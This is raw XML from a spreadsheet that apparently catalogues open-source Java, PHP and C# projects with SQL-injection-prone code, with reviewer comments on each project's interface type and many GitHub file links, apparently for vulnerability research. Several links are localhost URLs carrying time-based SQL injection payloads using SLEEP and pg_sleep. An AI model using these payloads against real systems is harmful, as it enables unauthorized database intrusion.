    <pivotField axis="axisPage" compact="0" outline="0" multipleItemSelectionAllowed="1" showAll="0">
      <items count="25">
        <item h="1" x="8"/>
        <item x="5"/>
        <item h="1" x="20"/>
        <item h="1" x="21"/>
        <item h="1" x="13"/>
        <item h="1" x="22"/>
        <item h="1" x="14"/>
        <item h="1" x="1"/>
        <item x="2"/>
        <item h="1" x="18"/>
        <item h="1" x="16"/>
        <item h="1" x="12"/>
        <item h="1" x="17"/>
        <item h="1" x="19"/>
        <item h="1" x="11"/>
        <item h="1" x="15"/>
        <item x="6"/>
        <item x="7"/>
        <item x="10"/>
        <item x="3"/>
        <item x="9"/>
        <item x="4"/>
        <item h="1" x="23"/>
        <item h="1" x="0"/>
        <item t="default"/>
      </items>
    </pivotField>
    <pivotField compact="0" outline="0" showAll="0"/>
    <pivotField compact="0" outline="0" showAll="0"/>
    <pivotField compact="0" outline="0" showAll="0"/>
    <pivotField compact="0" outline="0" showAll="0"/>
    <pivotField compact="0" outline="0" showAll="0"/>
  </pivotFields>
  <rowFields count="1">
    <field x="2"/>
  </rowFields>
  <rowItems count="7">
    <i>
      <x v="4"/>
    </i>
    <i>
      <x v="2"/>
    </i>
    <i>
      <x v="1"/>
    </i>
    <i>
      <x v="5"/>
    </i>
    <i>
      <x v="3"/>
    </i>
    <i>
      <x/>
    </i>
    <i t="grand">
      <x/>
    </i>
  </rowItems>
  <colFields count="1">
    <field x="3"/>
  </colFields>
  <colItems count="5">
    <i>
      <x/>
    </i>
    <i>
      <x v="1"/>
    </i>
    <i>
      <x v="2"/>
    </i>
    <i>
      <x v="3"/>
    </i>
    <i t="grand">
      <x/>
    </i>
  </colItems>
  <pageFields count="1">
    <pageField fld="5" hier="-1"/>
  </pageFields>
  <dataFields count="1">
    <dataField name="Count of Interface Type" fld="2"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 dT="2023-08-14T22:29:30.31" personId="{BCC8DD48-1317-4BD6-9F2F-653F5E1C107C}" id="{D2C25AD5-A4B3-4AA8-9B47-C0468575435E}">
    <text>This project looks like a web app because of the aspx and css files in the folder NopCommerceStore</text>
  </threadedComment>
  <threadedComment ref="C6" dT="2023-08-14T22:45:42.10" personId="{BCC8DD48-1317-4BD6-9F2F-653F5E1C107C}" id="{53E1BA1E-D85B-4061-928D-CEC9ABA07CFF}">
    <text>I can't really tell what type of interface this project has, my guess would be web app</text>
  </threadedComment>
  <threadedComment ref="C7" dT="2023-08-14T23:17:04.86" personId="{BCC8DD48-1317-4BD6-9F2F-653F5E1C107C}" id="{F9940F82-4288-46FB-9D87-D0CE32CE05A7}">
    <text>According to the readme, this project is a digital experience platform, an integrated set of technologies designed to enable the composition, management, delivery and optimization of contextualized digital experiences across multiexperience customer journeys. I labelled this project as Library/Framework.</text>
  </threadedComment>
  <threadedComment ref="C13" dT="2023-08-16T01:48:37.77" personId="{BCC8DD48-1317-4BD6-9F2F-653F5E1C107C}" id="{C8025E31-08D4-4E51-8B3E-02BAB3EBF174}">
    <text>I believe this project contains files for a game made with Unity3D. There are many game-related files in the War/Client/Assets folder. I labelled this project as Standalone app.</text>
  </threadedComment>
  <threadedComment ref="C15" dT="2023-08-16T01:59:11.21" personId="{BCC8DD48-1317-4BD6-9F2F-653F5E1C107C}" id="{833103F9-F07A-4AE5-97F6-C9971FF4E38D}">
    <text>This one is a library/framework. The documentation on https://code.google.com/archive/p/nohros-must/
states
"This project contains several of Nohros' core .NET libraries that we use in our many .NET-based projects."</text>
    <extLst>
      <x:ext xmlns:xltc2="http://schemas.microsoft.com/office/spreadsheetml/2020/threadedcomments2" uri="{F7C98A9C-CBB3-438F-8F68-D28B6AF4A901}">
        <xltc2:checksum>1589945999</xltc2:checksum>
        <xltc2:hyperlink startIndex="54" length="46" url="https://code.google.com/archive/p/nohros-must/"/>
      </x:ext>
    </extLst>
  </threadedComment>
  <threadedComment ref="D16" dT="2023-08-16T02:05:07.64" personId="{BCC8DD48-1317-4BD6-9F2F-653F5E1C107C}" id="{ABAC31AB-9847-4B98-BE24-17690196835A}">
    <text>Based on the name of the repo ("GroupProject223"), this is probably a student project.</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github.com/Biblivre/Biblivre-5/raw/f7d3bf44d4c7bb555d4e83c17df6cdf25b4a4e90/src/java/biblivre/administration/indexing/IndexingGroupsDAO.java" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cgc-carbon/CGC_ERP/raw/a2ac0f6c25a9bda04a0933c980948f13b8814017/src/java/com/cgc/DB/D_product_receive_track_detailDAO.java" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vitorwolski/security-updates/raw/a326890b26eb2ee7fa1796972b3fe33444b59044/lib/quartz-2.3.0/src/org/quartz/impl/jdbcjobstore/SimplePropertiesTriggerPersistenceDelegateSupport.java" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Java-Camp/Back-end/raw/533874b537f805716dfe83f9b72306c4cda8dd7b/src/main/java/com/jcf/orm/sql/EntityDAO.java" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/xfifix/SEO_REPO/raw/2dbb840b03e85c98f1339f60967670dcbc71aacf/SIMILARITY_METRICS/src/vsm/InsideMagasinSimilarityWorkerThread.java" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:5000/api/v1/EndUser?SortBy=1;%20SELECT%20pg_sleep(20)%20--%20&amp;Limit=10&amp;Offset=0" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SpeciesDecipit/Thesis-PML-DL/raw/f11b4b30cdf034a69625db3ba6249bcc479f7049/data/code/java/negative_sample/DatabaseShardManager.java" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/EntropyTeam/entropy-pf/raw/8d0e08641e1a40f87ad2e77a08a87daa8c45ea53/producto/trunk/Entropy_Profesor/src/backend/dao/dise%C3%B1os/DAOInstitucion.java" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Atreus1125/PlantMore/raw/db5b4cb74a6e33f80d94d0f287d3db222a75536d/src/shop/dao/impl/GoodsDAOImpl.java" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gy0531/jsprun/raw/b350aab4296d3b18fda61528ba861ce03d61b7c3/src/cn/jsprun/service/AdvSetService.java" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/teaching/FindStudentInfo?sortname=SLEEP(1000)%20--%20&amp;page=1&amp;rp=1&amp;roleid=1&amp;sortorder=1&amp;query=&amp;qtype=" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/YQmomo/supervise/raw/8fc9205cb803164533a373585abf7b1b92e74e19/gov.df.fap/gov.df.fap.service/src/main/java/gov/df/fap/service/portal/impl/IPaginationServiceImpl.java" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/EnWaffel/random-utilities/raw/d311b6069258f81140c78b7b19a83cc0c2b4d5c5/utils/src/main/java/de/enwaffel/randomutils/sql/MySQL.java" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/pages/front/goods/GoodsServletFront/list?col=SLEEP(1000)%20OR%20?%20=%20?%20OR%20?%20=%20?%20--" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/phenoscape/phenoscape-nlp/raw/6522bcd2d15ada4c904ff4601a12ece16840c64a/parsing-gui/src/fna/db/HabitatParserDbAccessor.java" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/a2531509/eracloud_jx/raw/c2b4ff07e4ba6d4f4c09e56454720e2003df038d/src/com/erp/util/CreateBean.java" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/pivotTable" Target="../pivotTables/pivotTable1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Meiyerlove/teaching/raw/d22d0c007f0d03376bc20565d15433c082372b05/src/com/cxjava/action/StudentInfoManagerDao.java" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kosmas1991/MusicDB/raw/798e11fb5f5210a6541ae96278a31c5865058478/src/model/DataSource.java" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/jsprun/other.do?action=adv&amp;orderby=SLEEP(1000" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/evgenymalishevskiy/JD2018-11-13-000/raw/4c7673a49f065a87e57e3125b378f382440a4163/src/by/it/naumenko/jd03_03/MyDAO.java" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Morphage/jSCAPE/raw/2d2817be3d5f5ddaea17a3e449303ef39c66a729/jSCAPE%20AdminTool/src/jscape/database/StudentTable.java" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Nwanda/jforum/raw/4d883758e039ae388375d72901a0b2802f90217e/src/net/jforum/dao/generic/GenericKarmaDAO.java" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kenankd/RPR_Project/raw/0cebfd35fb4e41914f47f9518862a75212e2462c/src/main/java/ba/unsa/etf/rpr/dao/AbstractDao.java" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/curtiszimmerman/TellFinder/raw/5fa920ca5b24f8ca87e35400eeccf55fda75aa7e/src/oculus/memex/rest/ServerResource.java" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/victorst79/DAW-Java-Works/raw/a28a55daad7593305024f04f5b52e3185d9b958d/Agenda/src/AgendaBD.java" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/svn2github/s2container/raw/625adc6c4e1396654a7297d00ec206c077a78696/tags/2009-05-19/seasar2-2.4.37/s2jdbc-gen/s2jdbc-gen/src/main/java/org/seasar/extension/jdbc/gen/internal/version/SchemaInfoTableImpl.java" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/LukaOrlovic/TicTacToe/raw/bed0b300a81e286971ab44348c66b2067772a0d1/TicTacToeServerApplication/src/brokerBazePodataka/BrokerBazePodataka1.java" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/myfosse/University-6_sem_sake_tasks_1_6/raw/5a981321526107092ad4101a54af4f40e2bd4a2e/src/main/java/dao/sql/DatabaseHandler.java" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/firedevelop/Programming/raw/920f88348633affc5892b60f8b83c74fafb9ada7/Java/TimBuchalka/Java_MasterClass_0262_020/src/com/timbuchalka/model/Datasource.java" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Biplon/PlayertoSQL/raw/8123e8efe368747ff0f7a4f51d66ec288ef8e712/src/pts/java/database/DatabaseManager.java" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cis423-team1/gps_with_friends/raw/dd3e7e707a86c4bccbd387fe06f5f23511e48ed2/mysql-connector-java-5.1.25/src/testsuite/regression/MetaDataRegressionTest.java" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BETAJIb/ikol/raw/f3709ea10be2d155b0bf1dee487f53c723f570cf/L2J_Mobius_7.0_PreludeOfWar/java/org/l2jmobius/tools/dbinstaller/util/mysql/DBDumper.java" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/URMC/i2b2/raw/29f26382db8419a95a1119fc665a3c3f6c404765/server/edu.harvard.i2b2.crc/src/server/edu/harvard/i2b2/crc/dao/pdo/PageTotalDao.java" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/liuhuiAndroid/tcc-transaction-master-1.2.x/raw/6bc383e4121325861bae56840348ac2fa4187759/tcc-transaction-core/src/main/java/org/mengyun/tcctransaction/repository/JdbcTransactionRepository.java" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/barrycom/kgmx/raw/f2ad7902d06d36fdb908c6c098f36c978907b05f/src/com/jetcms/cms/dao/assist/impl/CmsSqlserverDataBackDaoImpl.java" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/maximilianocorrea/libertya/raw/780a87ef4a76e6c36cd64ee07466e52ca1921b1d/FreeQueryBuilder/nickyb/fqb/nickyb/fqb/DialogCount.java" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SumeetMoray/Nearby-Shops-API-Deprecated/raw/ce04e4ced3bb8d40805fcff053b3cd6b125e8737/api/src/main/java/org/nearbyshops/DAOsPreparedRoles/EndUserDAONew.java" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Eg-Krutalevich/KP/raw/4369226d4ca8ec9a490ef4d16d619493785985e7/Server/src/tables/VacancyTable.java" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/snava10/cubanews/raw/452083fafa1f1ea67959eba3a9f0170446a584f9/crawler/src/main/java/com/snava/cubanews/data/access/SqliteMetadataDatabase.java"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kahap/justtesting/raw/acf91fa81155e1b146160ac3c28bb6ae3091c8c0/admin_advanced/cls/API.cls.php" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kartiksoni/digibook/raw/6cf80996d3b8c41a63d084a3079fe6483c416039/product/pharmacy/view-prescription.php" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/raystonge/tracker/raw/45022498d31c45b632fa0b1c3a91b6b79142dbe3/public_html/include/tracker/organization.php" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bhagam19/inventarioApp/raw/5c24872b33e6c6e85c104782694693e20c176e96/bdBienes/01.02-cargarConsultaInicial.php" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/raj9785/jamboree_singapore/raw/45b659326e16c3952b06619f11b01b65443648bb/apis/include/DbHandler.php" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dodoas/lodo/raw/1333ba3404b2e60cfd4862ad6b8f07dc8e1b15a1/code/lib/db/db_mysqli.class.php" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sicommnend/SMD-1.0/raw/a6cdb750e050732572b2019e2fe86ea5271a4ad5/Sources/Subs-Db-mysql.php" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Hrant75/Homeworks/raw/95da29b748234034f2b53bcee46951375099ccd1/Homework24/engine.php" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/avshatalov48/geekbrains/raw/e95fb1dd4ea802fa918dadf130760be6ea09de1e/php-1/hometask-5/engine/counters.php" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/inventarioApp/bdBienes/01.00-cargarArchivos.php?o=SLEEP(1000)%20--" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dimas071/REST-API-CRUD/raw/8b27d130390bec829effd1989a3e76d1673c8a63/rest/api/Rest.php" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/thaian229/Web-Programming/raw/7996e60337c832323735cd53feaa06efca4248b6/lab08/exercise/part2/library/sqlquery.class.php" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Nasim992/IUBAT_JOURNAL_2/raw/94306ece1585261594335750715cbeeaa993203f/link/functions.php" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/15Faiq/projek_pkl/raw/bc38b5cf91e814effedaa27b370545e7709ad7b9/code%20crud/table-siswa.php" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pratik210594/foodorderingsystem/raw/e5b28a447621b248c7f5189926d6708cd5d284f4/FoodOrderingSystem/orderplaced.php" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Shivam010/Question-Answer-Platform/raw/21bf723a22606e70449eef3d8fc1682a423d596f/categories.php" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/disit/snap4city/raw/6fd64fa9f107779420d92098b4f76e77340778a2/Heatmap/odft/od/trajectories_clusters.php" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nishangsys/Jungle/raw/842927e8eeeb8e2857dc1a7ebd66164dd25c7057/POS/cash/fetchs.php" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/chslava/amed/raw/b6cd944f6f36a840d3dcfe7e357a6de54d1438fb/shop/svs/veikals/dzest_ok.php" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vielhuber/magicreplace/raw/5c8574875936265aec7813f85e4ac4fd8dce16de/tests/tools/interconnect-search-replace/4.1.1/srdb.class.php" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/s-m-r-z/SocietyManagementSystem/raw/f9d642952ed9588dd2f6a9eee5b7d5db5a4d4f50/admin/includes/loadInfo/manage_security.php" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/adamzedd617/Event-website-fullSystem/raw/b20938fcb81d627eeb7ddacb18886edd0670eb94/admin/search.php" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/lixin-wei/XiaoShanBigScreen/raw/a3acfc33c046b322f6e81cb96847483f4c3c7d27/php/mysqlAll.php" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ekowamoonu/ledgerpro/raw/7acc4149b6d9d8e739236c3d5eb09f6810b1cea1/classes/querying_class.php" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SowkatAlam/Location-Based-restaurant-finder-and-Rating-System/raw/95b259b8560c0714740e45cc5c5e4df67f868d07/res_registration.php" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/miningchat/miningchat/raw/6ec9f371f739614710447f73bd016d72b3af1e61/modules/requires/create_users_table.php" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ibmhndr/PraktikumWebC/raw/e1fbefb21441d18b9b944ba9fac7feec71fc1f38/FINAL%20PROJECT/homemhs.php" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/annaelvira24/IF3110-willy-wangkys-web/raw/91b2608f1120b5bb1a9b9c29aac26949ff84d073/php/search_result.php" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/osaeris/epmanager3/raw/20652c1e18ebbc97d4cd650a2f1158b7afc8aafc/usr/share/epmanager3/userfunctions.php" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Magui-28-Magui/tracker/raw/aad36a7910cc5cd791181a80e5ee6f48b7b52867/action-item-list/functions/functions.php"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github.com/TheBigBang2/GroupProject223/raw/d8b98322dc35a1da43ff7ae7244064451cfed4db/GroupProject223/MaintainBooking.cs" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/brendachongg/ACI/raw/d26a77c53fd50f2b3888e78bec7091d141a7ad6f/ACITMS/ACI_TMS/App_Data/Data/DB_Batch_Session.cs" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/matthieu-dubois/MDU_ReaderNFC/raw/bebe93de751f06f8742e55465a06bcdb1777d32b/WindowsFormsApp1/Form1.cs" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="../comments1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mwilian/demos/raw/3ea0318dedb13536024314207812ee1b4e900f34/DAO/POGDataAccess.cs" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Linwenqiang-git/AttributeSql/raw/162871712fd88214d02e37ec1d646cd2bd02426e/AttributeSqlDLL.Core/Repository/AttrBaseRepository.cs" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kartyeks/Billing/raw/66a4e770ca3df5bd75e1669b83b596f35d627106/HRManager/ExtendedBusinessObjects/Recruitment/Master_CandidateBusinessObject.cs" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/joethinh/nohros-must/raw/8d96144c969ff8f59d4f7c20eda1b4fc3fb1b22b/src/impl/providers/sqlce/queries/AddStateQuery.cs" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vikiii22/DesarrolloInterfaces/raw/95dd0bc80338b17bb4a1885c2fe2bbb9e3ba7f9f/WPF/EjerciciosWPF/proyectoFinal/proyectoFinal/proyectoFinal/winLibroLibreria.xaml.cs" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/zhenghua75/WeiXinEasy/raw/f21f0f0788f4792a1e30ec4e8ec190984ca13713/DBUtility/DbHelperSQLite.cs" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/guoyu07/XSTORE/raw/2462dbdb6a9d0acb5b21b10c639e9030ad20fd56/%E4%BA%8C%E4%BB%A3/X_STORE/tdx.database/tdx.database/database/B2C_vipcard.cs" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing1.vml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/iEricZHENG/KiwiCrawler.CASM/raw/6729717bc943b4f23a2be1fad44e85946aef5644/DBUtility/DbHelperOra.cs" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sajjucode/programmermate/raw/668733b2b3e9cb3164674c86d18ccdffc5fb6563/Pss.ProgrammerMate.DAL/ProjectMethodsDAL.cs" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SoftSuite/SHND/raw/9811de3acd382d2e9c9981cc0587c174fa56658f/DAL/Views/VMaterialNutrientDAL.cs" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dnobori/DN-OSS-Learn/raw/55dd666bae224427e2847f29b8aa2888d68c2763/dotnet-5.0.0/SqlClient-2.1.0-preview2/src/Microsoft.Data.SqlClient/tests/ManualTests/SQL/SqlBulkCopyTest/Transaction1.cs" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/NishiokaTakeo/spider-spiderdocs/77485a3e240981b502913775768d875f2c2bb76a/WebSpiderDocs/Helpers/Customs/DaoBase.cs" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/NguyenDuyCuong/EFormSystem/raw/5144d60a3e4b7012452d67177175e5edd6653c8c/02.Reference/AlbumViewerVNext-master/src/AlbumViewerBusiness/Westwind.BusinessObjects/Utilities/DataAccessBase.cs" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jorik041/osmsharp/raw/cb30ff535717fce3fef5d7f19d0e36a24137d8bc/Data/Oracle/OsmSharp.Osm.Data.Oracle/SimpleSchema/Processor/ChangeSets/OracleSimpleChangeSetApplyTarget.cs" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/wuchao288/wexin/raw/5f932bbf01b06f12df01e2adcfede3f32e0c38e3/Hidistro.SqlDal/Store/MenuDao.cs" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/wqjzzgci/hydronumerics/raw/20051f52e1b921deca0d94670f46b54dadea4139/ThirdPartySoftware/DataConnector/DataConnectorWCF/Services/SQLService.svc.cs" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/398786172/GIT/raw/f32453a546d819f0e5e438d58f77facfd41dbb7f/OCV0625/DBUtility/SQLServerHelp.cs" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.microsoft.com/office/2017/10/relationships/threadedComment" Target="../threadedComments/threadedComment1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/caixianqi/RLMedicine/raw/7f93c98654d2708da0d8cf1af7d3ae80c0fd1040/%E6%97%A5%E7%AB%8B%E5%8C%BB%E7%96%97%E7%A8%8B%E5%BA%8F/Backup1/Source/IImportData/DataAcc.cs" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/joeywda/Srvtools/raw/e1e7fb954894d78772bfb4aa1aec53d51a3b0aba/LogSQLBuilder.cs" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/16it/sharpmap/raw/8cd83f89b85c028ba14f8adfbd304dfd1f36e4f0/Branches/Trunk-Benjii/SharpMap.Extensions/Data/Providers/SqlLite.cs" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 